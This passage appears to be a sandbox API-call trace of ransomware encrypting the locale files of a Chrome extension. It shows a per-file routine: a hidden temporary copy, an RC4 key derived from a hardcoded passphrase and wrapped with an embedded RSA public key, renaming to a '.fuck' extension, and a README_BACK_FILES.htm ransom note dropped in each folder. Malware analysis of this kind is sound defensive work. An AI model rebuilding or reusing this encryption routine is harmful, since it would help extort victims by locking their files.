Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.fuck")) returned 1 [0254.784] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0254.784] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.784] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.784] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.784] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.784] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\readme_back_files.htm")) returned 0xffffffff [0254.785] AreFileApisANSI () returned 1 [0254.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e33b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.785] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.786] GetFileType (hFile=0x5d50) returned 0x1 [0254.786] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.788] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.788] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.789] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.789] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.789] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.789] GetLastError () returned 0x0 [0254.789] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json")) returned 0x20 [0254.789] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json", dwFileAttributes=0x80) returned 1 [0254.790] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.790] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.791] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.792] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.794] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.794] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.794] CryptHashData (hHash=0x2e18828, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.795] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.795] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.795] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.795] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10f90) returned 1 [0254.795] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10f90, dwCertEncodingType=0x1, pInfo=0x2990b00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2990b30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2990b38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18168) returned 1 [0254.795] CryptEncrypt (in: hKey=0x2e18168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.795] CryptEncrypt (in: hKey=0x2e18168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10b50*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10b50*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.796] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e10b50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10b50*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.797] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x11e, lpOverlapped=0x0) returned 1 [0254.798] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x11e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0254.798] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0254.799] CloseHandle (hObject=0x5d5c) returned 1 [0254.799] CloseHandle (hObject=0x5d60) returned 1 [0254.799] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), bFailIfExists=0) returned 1 [0254.803] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json", dwFileAttributes=0x0) returned 1 [0254.803] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.gsg")) returned 1 [0254.804] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.fuck")) returned 1 [0254.806] CryptDestroyHash (hHash=0x2e18828) returned 1 [0254.806] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.806] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.806] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.806] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.806] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\readme_back_files.htm")) returned 0xffffffff [0254.806] AreFileApisANSI () returned 1 [0254.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.806] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.807] GetFileType (hFile=0x5d50) returned 0x1 [0254.807] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.809] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.809] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.810] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.810] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.810] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.810] GetLastError () returned 0x0 [0254.810] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json")) returned 0x20 [0254.811] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0254.811] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.812] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.814] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.814] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.817] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.817] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0254.817] CryptHashData (hHash=0x2e18828, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.817] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.817] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.817] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.817] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e10d70) returned 1 [0254.818] CryptImportPublicKeyInfo (in: hCryptProv=0x2e10d70, dwCertEncodingType=0x1, pInfo=0x2990890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29908c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29908c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e181a8) returned 1 [0254.818] CryptEncrypt (in: hKey=0x2e181a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.818] CryptEncrypt (in: hKey=0x2e181a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e10468*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e10468*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.818] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e10468*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e10468*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.820] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x13e, lpOverlapped=0x0) returned 1 [0254.821] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x13e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x140) returned 1 [0254.821] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x140, lpOverlapped=0x0) returned 1 [0254.822] CloseHandle (hObject=0x5d60) returned 1 [0254.822] CloseHandle (hObject=0x5d5c) returned 1 [0254.822] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0254.826] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0254.827] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0254.828] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0254.830] CryptDestroyHash (hHash=0x2e18828) returned 1 [0254.830] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.830] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0254.830] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.830] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0254.830] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0254.830] AreFileApisANSI () returned 1 [0254.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0254.830] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.831] GetFileType (hFile=0x5d50) returned 0x1 [0254.832] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.833] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.833] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0254.835] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.835] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.835] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.835] GetLastError () returned 0x0 [0254.835] GetFileAttributesA 